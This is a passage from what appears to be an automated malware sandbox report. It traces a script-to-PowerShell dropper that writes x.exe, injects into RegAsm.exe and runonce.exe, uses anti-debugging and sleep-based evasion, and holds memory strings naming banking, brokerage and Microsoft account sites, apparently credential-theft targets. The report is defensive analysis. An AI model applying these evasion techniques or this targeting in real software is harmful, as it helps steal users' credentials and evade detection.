                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34590943 push E95ABAD0h; ret 3_2_00007FFD345909C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041F04F push ebx; ret 7_2_0041F058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00403280 push eax; ret 7_2_00403282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041AB61 pushfd ; ret 7_2_0041AB78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041ABD6 push ds; ret 7_2_0041ABD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040D38A push edx; iretd 7_2_0040D453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00426CC3 pushad ; iretd 7_2_00426CEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004084DA push esi; retf 7_2_004084DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004084FF push ebp; iretd 7_2_00408502
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00412559 push ecx; iretd 7_2_0041255A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004125DC pushfd ; iretd 7_2_004125FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00405E25 push ecx; ret 7_2_00405E2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00401F0E push ss; retf 7_2_00401F14
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B509AD push ecx; mov dword ptr [esp], ecx7_2_02B509B6
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0506A5DE pushfd ; ret 9_2_0506A5F5
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_05057F57 push esi; retf 9_2_05057F5A
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_05065F64 push eax; ret 9_2_05065F70
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_05057F7C push ebp; iretd 9_2_05057F7F
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_05061FD6 push ecx; iretd 9_2_05061FD7
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0505CE07 push edx; iretd 9_2_0505CED0
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_0506A653 push ds; ret 9_2_0506A655
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_05062059 pushfd ; iretd 9_2_05062078
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_050558A2 push ecx; ret 9_2_050558A8
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exeCode function: 9_2_050638D6 push 2C1D344Fh; ret 9_2_050638DD
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_04BD09AD push ecx; mov dword ptr [esp], ecx10_2_04BD09B6
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACF2D6 push ecx; iretd 10_2_00ACF2D7
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AC527C push ebp; iretd 10_2_00AC527F
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AC5257 push esi; retf 10_2_00AC525A
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ACF359 pushfd ; iretd 10_2_00ACF378
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00AD78DE pushfd ; ret 10_2_00AD78F5
                Source: x.exe.3.drStatic PE information: section name: .text entropy: 7.944614992577453
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2310000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCD1C0 rdtsc 7_2_02BCD1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3430Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 3.1 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 988Thread sleep count: 95 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 988Thread sleep time: -190000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe TID: 6368Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ADC8D0 FindFirstFileW,FindNextFileW,FindClose,10_2_00ADC8D0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 6511-iOQ--.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 6511-iOQ--.10.drBinary or memory string: discord.comVMware20,11696487552f
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169648hR
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648m]
                Source: 6511-iOQ--.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: powershell.exe, 00000003.00000002.2353062067.0000026FED801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: East & CentralVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696481]
                Source: wscript.exe, 00000000.00000003.2360601425.0000026AACD1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2364135668.0000026AACD1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2358219793.0000026AACD1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2365846996.0000026AAF3AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000003.00000002.2353062067.0000026FED801000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 6511-iOQ--.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 6511-iOQ--.10.drBinary or memory string: global block list test formVMware20,11696487552
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11QR5
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552t
                Source: wscript.exe, 00000000.00000002.2365846996.0000026AAF370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: 6511-iOQ--.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: runonce.exe, 0000000A.00000002.3424407770.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3424872644.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 6511-iOQ--.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 6511-iOQ--.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 6511-iOQ--.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 6511-iOQ--.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 6511-iOQ--.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 6511-iOQ--.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: runonce.exe, 0000000A.00000002.3429827044.0000000007D22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1R]2
                Source: 6511-iOQ--.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 6511-iOQ--.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: firefox.exe, 0000000D.00000002.3082285371.000001CF0C5BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCD1C0 rdtsc 7_2_02BCD1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00417A93 LdrLoadDll,7_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD92BC mov eax, dword ptr fs:[00000030h]7_2_02BD92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD92BC mov eax, dword ptr fs:[00000030h]7_2_02BD92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD92BC mov ecx, dword ptr fs:[00000030h]7_2_02BD92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD92BC mov ecx, dword ptr fs:[00000030h]7_2_02BD92BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B652A0 mov eax, dword ptr fs:[00000030h]7_2_02B652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B652A0 mov eax, dword ptr fs:[00000030h]7_2_02B652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B652A0 mov eax, dword ptr fs:[00000030h]7_2_02B652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B652A0 mov eax, dword ptr fs:[00000030h]7_2_02B652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov eax, dword ptr fs:[00000030h]7_2_02BE62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov ecx, dword ptr fs:[00000030h]7_2_02BE62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE62A0 mov eax, dword ptr fs:[00000030h]7_2_02BE62A0
